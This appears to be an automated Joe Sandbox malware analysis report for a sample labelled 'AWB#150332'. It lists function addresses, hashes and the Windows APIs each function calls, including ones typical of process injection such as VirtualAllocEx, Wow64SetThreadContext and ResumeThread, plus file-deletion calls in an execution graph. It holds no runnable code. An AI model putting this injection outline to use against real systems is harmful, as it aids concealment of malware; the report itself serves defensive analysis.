                                                                      • Instruction Fuzzy Hash: A9212AB1C003499FDB10DFAAC841BDEBBF5FF48310F508429E518A7250C7799941CBA4
                                                                      Function 0753D978 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0753D9F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: d2cf1b42b91503abec239283c8695930e77c2c38e4f8b619b5d369990e466652
                                                                      • Instruction ID: 108cb496057f62b6407182737c9fe4ff1fdd16e08d57571b6ab933c18140bace
                                                                      • Opcode Fuzzy Hash: d2cf1b42b91503abec239283c8695930e77c2c38e4f8b619b5d369990e466652
                                                                      • Instruction Fuzzy Hash: 6B2115B5D003098FDB10DFAAC485BEEBBF4EF48320F54842AD559A7240CB789945CFA5
                                                                      Function 0180D810 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0180D897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 0db2dbe719b8458b931d8a1e2621b5878a50255d00f239b0b060b79d9dcd0429
                                                                      • Instruction ID: 26c08c1084a9c99e2fd27c645465541ac78a5ae39928341877b514b2c28094ac
                                                                      • Opcode Fuzzy Hash: 0db2dbe719b8458b931d8a1e2621b5878a50255d00f239b0b060b79d9dcd0429
                                                                      • Instruction Fuzzy Hash: 6F21E4B5D002099FDB10CF9AD884ADEFBF8EB48310F14841AE918A3350D379AA45CFA4
                                                                      Function 0753DE50 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0753DEC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: bc1c7144552dd0a544ea6bdf09aa9ac98049a3f5ba469d23b429d3e66afca1f6
                                                                      • Instruction ID: 4e8a578427fc3f1a4da862537f57f6d361e351ad38b9a416ddd15178cdf101b5
                                                                      • Opcode Fuzzy Hash: bc1c7144552dd0a544ea6bdf09aa9ac98049a3f5ba469d23b429d3e66afca1f6
                                                                      • Instruction Fuzzy Hash: 071167769003499FCB20DFAAD845BEEBFF5EB48320F10881AE519A7250CB769541CBA1
                                                                      Function 0753D8C0 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 6711bcc923b6c7b854da0b14032766cd4fd21043fbfa84a9d9630fec7f0aeceb
                                                                      • Instruction ID: bb7bebc2093bf4d85a933bdd4e5b4e01ade902adcb8b74e22cf1f4053fb7169b
                                                                      • Opcode Fuzzy Hash: 6711bcc923b6c7b854da0b14032766cd4fd21043fbfa84a9d9630fec7f0aeceb
                                                                      • Instruction Fuzzy Hash: 08115BB5D003498FDB20DFAAC4457EEFBF5EB88220F248419D559A7240CB75A541CF94
                                                                      Function 0753DE58 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0753DEC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: d133ffc24f2203bb4b5f87d87d54aff8b13b1aa657c3a9089896435fa55109e4
                                                                      • Instruction ID: efae7ea37592e0dc60232f73f1095586a14e523a74a4c0b3343b9148bfd93d06
                                                                      • Opcode Fuzzy Hash: d133ffc24f2203bb4b5f87d87d54aff8b13b1aa657c3a9089896435fa55109e4
                                                                      • Instruction Fuzzy Hash: A81144759003499FDB20DFAAC844BDEBBF5AB48320F108819E519A7250CB75A940CBA0
                                                                      Function 0753D8C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 25c60bf6acc09864673708be92f4bf32cdee72bb2b71fa54827baa16a820e6ae
                                                                      • Instruction ID: a5315ad051e7a4935326b9e7c784cf7eae6b12972e173ea94f28af96171b9a14
                                                                      • Opcode Fuzzy Hash: 25c60bf6acc09864673708be92f4bf32cdee72bb2b71fa54827baa16a820e6ae
                                                                      • Instruction Fuzzy Hash: F1113AB5D003498FDB20DFAAC4457EEFBF5EB88320F248419D519A7240CB79A941CF94
                                                                      Function 0180B118 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0180B17E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 87688ed2122cb8ad09bc14cd7d46a1401b76881f5e12f03ceef4ea7c465d3fb8
                                                                      • Instruction ID: d639ab916080030f63d137146e5f083e1b714c990f6ca5feea5bbe5a0d5629af
                                                                      • Opcode Fuzzy Hash: 87688ed2122cb8ad09bc14cd7d46a1401b76881f5e12f03ceef4ea7c465d3fb8
                                                                      • Instruction Fuzzy Hash: 9F11D2B9C007498FDB21DF9AC844B9EFBF4EB48314F10841AD519A7250C379A545CFA5
                                                                      Function 0156D1FC Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6baf459d4e524055fd12d8d6b9ad1da660897b704949bd0f5df901742f1d1b7f
                                                                      • Instruction ID: b13ed809311e0fcc6b68b0a3e5ee6e36ca6274bbe2a0f8652aef13617ad21f79
                                                                      • Opcode Fuzzy Hash: 6baf459d4e524055fd12d8d6b9ad1da660897b704949bd0f5df901742f1d1b7f
                                                                      • Instruction Fuzzy Hash: 7A21D672604240DFDB15DF94D9C4B2ABBB9FB88324F24C969E9850F246C336D456CBE1
                                                                      Function 0156D3D8 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86df6e4216a56db5abb325e062dd2a5252036b3ab3cc46bee7fe7cd1b2f1a57c
                                                                      • Instruction ID: 0d380f5837d729bd766dd780c0f7d2401e1441f76a415dd961051b02e51535d7
                                                                      • Opcode Fuzzy Hash: 86df6e4216a56db5abb325e062dd2a5252036b3ab3cc46bee7fe7cd1b2f1a57c
                                                                      • Instruction Fuzzy Hash: A2213372604244DFDB15DF44D9C0B5ABBB9FB88325F20C969E8490F246C376E846CAE2
                                                                      Function 0157D1D4 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257094780.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_157d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b93d04098ac4325f77aad98b8e23a55bc65ae11d744320dee377cd876644cf46
                                                                      • Instruction ID: 0d7748a3b2263adca2e9e22d138aec137aa4fb42253bbde1723c97d4f360b001
                                                                      • Opcode Fuzzy Hash: b93d04098ac4325f77aad98b8e23a55bc65ae11d744320dee377cd876644cf46
                                                                      • Instruction Fuzzy Hash: F721D3716042009FDB15DF94E9C1B15BBB5FF84324F24C9ADD9494F252C336D447CA61
                                                                      Function 0157D01C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257094780.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_157d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e02044b3b028f7cb2fabb3886312a1f99dc25161a5814413d8e685b149c89ab5
                                                                      • Instruction ID: 38cca074f7cc5df6809d92488051bba510150511a3f2f0d4dcfd1e33529958a9
                                                                      • Opcode Fuzzy Hash: e02044b3b028f7cb2fabb3886312a1f99dc25161a5814413d8e685b149c89ab5
                                                                      • Instruction Fuzzy Hash: 5A210075604200DFDB16DF54E985B26BBB1FF84314F20C96DD80A0F286D33AD807CA62
                                                                      Function 0157D006 Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257094780.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_157d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13f17d85f961a40d8c18adc5ef353e22243d0772d0377f1eeb8c00f92fce18ba
                                                                      • Instruction ID: b65d8c4aacef952ab4be00258dd9c335497245a55cb1f4322f9bd970bf7eefce
                                                                      • Opcode Fuzzy Hash: 13f17d85f961a40d8c18adc5ef353e22243d0772d0377f1eeb8c00f92fce18ba
                                                                      • Instruction Fuzzy Hash: 012159755093808FCB03CF24D990B15BF71EF46214F28C5EAD8498F6A7C33A980ACB62
                                                                      Function 0156D1F7 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                                      • Instruction ID: e4f170fd2b33691841f21a18648090a9dc55d59806844fb976a9574f95b3b20c
                                                                      • Opcode Fuzzy Hash: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                                      • Instruction Fuzzy Hash: 7C21CD76604240CFCB06CF44D9C4B1ABF72FB84324F24C5A9DC480B256C33AD426CBA1
                                                                      Function 0156D3D3 Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction ID: a01df388522875d2e33063624a64687fdca64ea07b32ae51351e943fe91e37a9
                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction Fuzzy Hash: 2D11CD76604240CFCB06CF44D5C0B5ABF72FB84324F2486A9D8490F256C33AE856CBA1
                                                                      Function 0157D1CF Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257094780.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_157d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                      • Instruction ID: 6f43389be14877f7197435ce100ade496a426837ce6e79d3919fdf15bcd26e76
                                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                      • Instruction Fuzzy Hash: 3511A975504280DFCB06CF54D5C0B19BBB2FB84224F28C6A9D8494B296C33AD40ACB61
                                                                      Function 0156D731 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35fdf2a96b7f7802832189b7f8c70193bde47a843a5048226a56596beb819c65
                                                                      • Instruction ID: aa67267e3c51e162748b3d6b8901179f573ebef1e1eff32b37b69158e435b9be
                                                                      • Opcode Fuzzy Hash: 35fdf2a96b7f7802832189b7f8c70193bde47a843a5048226a56596beb819c65
                                                                      • Instruction Fuzzy Hash: 6601A7316043849AE7205A65CDC476ABFECEF41265F18CD69ED894F182C67D9844CAF3
                                                                      Function 0156D730 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41f344ed0ec8720fc1073a940ac341e0e46b1fea95844d32956da2628647c433
                                                                      • Instruction ID: b7965ea99e2f1cf8393f9f4147239a8d89b2c2eae428595145197235078c8b18
                                                                      • Opcode Fuzzy Hash: 41f344ed0ec8720fc1073a940ac341e0e46b1fea95844d32956da2628647c433
                                                                      • Instruction Fuzzy Hash: 67F0C2311043849EE7108A19CC84B66FFACEB80334F18C55AED480F282C278A840CAF1

                                                                      Non-executed Functions

                                                                      Function 0753CE30 Relevance: .3, Instructions: 331COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e96ea1455276b1d5b277aa9c4daf285bc18f76acce3167611cd5d47f00ebf6be
                                                                      • Instruction ID: 5d154c6ae219fc8508ff14491a86541fc6a27cb17104170881a700187bce6ea8
                                                                      • Opcode Fuzzy Hash: e96ea1455276b1d5b277aa9c4daf285bc18f76acce3167611cd5d47f00ebf6be
                                                                      • Instruction Fuzzy Hash: F1D15FB1A01215CFCB15CF69C544AEDBBF2FF89214F25816AD418EB2A1D731DD82CBA0
                                                                      Function 0753B428 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97d7f035b545f9dd9f48e84b0b974b9f6d6059ad5b6e22df8d1e57333ee57cc0
                                                                      • Instruction ID: 7ed36232ec571f79ff73f5d564faf6b858ee0eddc7328208eb3ffa69ea7a6ef3
                                                                      • Opcode Fuzzy Hash: 97d7f035b545f9dd9f48e84b0b974b9f6d6059ad5b6e22df8d1e57333ee57cc0
                                                                      • Instruction Fuzzy Hash: 0FE1FAB4E002598FDB14DFA9C580AAEFBB2FF89304F248169D414AB355D734AD41CFA1
                                                                      Function 0753D0A0 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 080da904eea0265c872150d4c63d58cfb7a3cf0f933c3b88df965af7f238fa52
                                                                      • Instruction ID: 75da57d5697cfb0032bc5ab03937e47461872208435c0bf1043817866d1c412e
                                                                      • Opcode Fuzzy Hash: 080da904eea0265c872150d4c63d58cfb7a3cf0f933c3b88df965af7f238fa52
                                                                      • Instruction Fuzzy Hash: 19E1F9B4E002598FDB14DFA9C580AAEFBB2FF89304F248169D454AB365D735AD81CF60
                                                                      Function 0753AFF0 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fedff625f4a300b89caee1abafd3d0f50c68b11ec4d2e6a1fa6f3646f0f710f
                                                                      • Instruction ID: 47c9f28b72ee1c7d6402d7284c869fc66571080c9995b9d74c22016168931135
                                                                      • Opcode Fuzzy Hash: 5fedff625f4a300b89caee1abafd3d0f50c68b11ec4d2e6a1fa6f3646f0f710f
                                                                      • Instruction Fuzzy Hash: CCE10BB4E002598FDB14DFA9C580AAEFBB2FF89304F248169D414AB355D735AD42CFA0
                                                                      Function 0753BC98 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6f843dfe9ce8b0322226f68544640c4125f1868e7b3dade247ec0e03402a4da
                                                                      • Instruction ID: d1f64972a9d22c172cc384d2122c2bfbb3110b1cf5624c53db4b5ae8c4ce59f8
                                                                      • Opcode Fuzzy Hash: b6f843dfe9ce8b0322226f68544640c4125f1868e7b3dade247ec0e03402a4da
                                                                      • Instruction Fuzzy Hash: 58E10CB4E102598FDB14DFA9C580AAEFBB2FF89304F248169D414AB365D731AD81CF61
                                                                      Function 0753B860 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2bd4f01b1c8d54debf29fb6bb9dafc0b690da7edce62426e37c316562fc9a6f
                                                                      • Instruction ID: 206565394108eb14b7447108acf2828e88b4a2f67bbd941711414c4c270503d1
                                                                      • Opcode Fuzzy Hash: b2bd4f01b1c8d54debf29fb6bb9dafc0b690da7edce62426e37c316562fc9a6f
                                                                      • Instruction Fuzzy Hash: 90E1F8B4E002598FDB14DF99C580AAEFBB2FF89304F248169D415AB365DB31AD41CF60
                                                                      Function 0180D584 Relevance: .3, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fea2dbcc8c5140f7e684f1892f7b37f35c38b254eea220a37f15e1e4d612103f
                                                                      • Instruction ID: 30d552b08f665da5ec3c20bcca0aba1131a98c3c5121e10455537f3e915d4f21
                                                                      • Opcode Fuzzy Hash: fea2dbcc8c5140f7e684f1892f7b37f35c38b254eea220a37f15e1e4d612103f
                                                                      • Instruction Fuzzy Hash: 48A17436E0020A9FCF26DFB8C84059DB7B2FF85300B15856AEA05EB295DB31EA45CB40
                                                                      Function 0753BC87 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7ef2aacea58b7ba24bda2220bc5746ab308e3f28ae0035499041824e01c5849
                                                                      • Instruction ID: 46265b33c16f1d1dca4e6565b70f0eb653e76f3431c1670a7502a0bba393e403
                                                                      • Opcode Fuzzy Hash: c7ef2aacea58b7ba24bda2220bc5746ab308e3f28ae0035499041824e01c5849
                                                                      • Instruction Fuzzy Hash: E551F9B4E002598BDB14DFA9C5805AEBBB2FF89304F24816AD418AB365D7359942CFA1
                                                                      Function 07536728 Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d8fea6c1e09d2e3b098a7016594386aac4e9a49b3a444913b216e07c8ee2a75
                                                                      • Instruction ID: b3ab72ae1673a7e6db0aeb5059e3ea39b1c41ff524ccc33d1c750a88b9f7a90e
                                                                      • Opcode Fuzzy Hash: 1d8fea6c1e09d2e3b098a7016594386aac4e9a49b3a444913b216e07c8ee2a75
                                                                      • Instruction Fuzzy Hash: 0811E9B2D006189BEB08CF6B8C016DEFBF7BFC9200F04C4BAC408AA265EB3405468F51

                                                                      Execution Graph

                                                                      Execution Coverage:12.6%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:59
                                                                      Total number of Limit Nodes:5
                                                                      execution_graph 24153 2d10848 24155 2d1084e 24153->24155 24154 2d1091b 24155->24154 24158 2d113a0 24155->24158 24167 2d11392 24155->24167 24160 2d113a6 24158->24160 24159 2d114b8 24159->24155 24160->24159 24176 2d17530 24160->24176 24181 2d171ac 24160->24181 24186 2d171ea 24160->24186 24191 2d17249 24160->24191 24196 2d17070 24160->24196 24201 2d17080 24160->24201 24169 2d1139b 24167->24169 24168 2d114b8 24168->24155 24169->24168 24170 2d17080 DeleteFileW 24169->24170 24171 2d17070 DeleteFileW 24169->24171 24172 2d17249 DeleteFileW 24169->24172 24173 2d171ea DeleteFileW 24169->24173 24174 2d171ac DeleteFileW 24169->24174 24175 2d17530 GlobalMemoryStatusEx 24169->24175 24170->24169 24171->24169 24172->24169 24173->24169 24174->24169 24175->24169 24177 2d1753a 24176->24177 24178 2d17554 24177->24178 24206 62fd739 24177->24206 24210 62fd748 24177->24210 24178->24160 24183 2d171b1 24181->24183 24182 2d172db 24182->24160 24214 2d172e9 24183->24214 24218 2d172f8 24183->24218 24188 2d171ef 24186->24188 24187 2d172db 24187->24160 24189 2d172e9 DeleteFileW 24188->24189 24190 2d172f8 DeleteFileW 24188->24190 24189->24187 24190->24187 24193 2d1724e 24191->24193 24192 2d172db 24192->24160 24194 2d172e9 DeleteFileW 24193->24194 24195 2d172f8 DeleteFileW 24193->24195 24194->24192 24195->24192 24198 2d1707f 24196->24198 24197 2d172db 24197->24160 24198->24197 24199 2d172e9 DeleteFileW 24198->24199 24200 2d172f8 DeleteFileW 24198->24200 24199->24197 24200->24197 24203 2d17099 24201->24203 24202 2d172db 24202->24160 24203->24202 24204 2d172e9 DeleteFileW 24203->24204 24205 2d172f8 DeleteFileW 24203->24205 24204->24202 24205->24202 24208 62fd75d 24206->24208 24207 62fd972 24207->24178 24208->24207 24209 62fd988 GlobalMemoryStatusEx 24208->24209 24209->24208 24211 62fd75d 24210->24211 24212 62fd972 24211->24212 24213 62fd988 GlobalMemoryStatusEx 24211->24213 24212->24178 24213->24211 24216 2d172f8 24214->24216 24215 2d1733a 24215->24182 24216->24215 24222 2d163b8 24216->24222 24219 2d17308 24218->24219 24220 2d1733a 24219->24220 24221 2d163b8 DeleteFileW 24219->24221 24220->24182 24221->24220 24223 2d17358 DeleteFileW 24222->24223 24225 2d173d7 24223->24225 24225->24215

                                                                      Executed Functions

                                                                      Function 062FE549 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1230 62fe549-62fe563 1231 62fe58d-62fe5ac call 62fd204 1230->1231 1232 62fe565-62fe58c call 62fd1f8 1230->1232 1238 62fe5ae-62fe5b1 1231->1238 1239 62fe5b2-62fe611 1231->1239 1246 62fe617-62fe6a4 GlobalMemoryStatusEx 1239->1246 1247 62fe613-62fe616 1239->1247 1251 62fe6ad-62fe6d5 1246->1251 1252 62fe6a6-62fe6ac 1246->1252 1252->1251
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1338662820.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_62f0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81d3d5ce6240bf272e1bdbb96ad1d9d743c97494ee14acb55080e7d9dfbc451b
                                                                      • Instruction ID: ee135513932f7ce682849ba8aec969c9e5cd4423a1dba7ffe553a88286ffd577
                                                                      • Opcode Fuzzy Hash: 81d3d5ce6240bf272e1bdbb96ad1d9d743c97494ee14acb55080e7d9dfbc451b
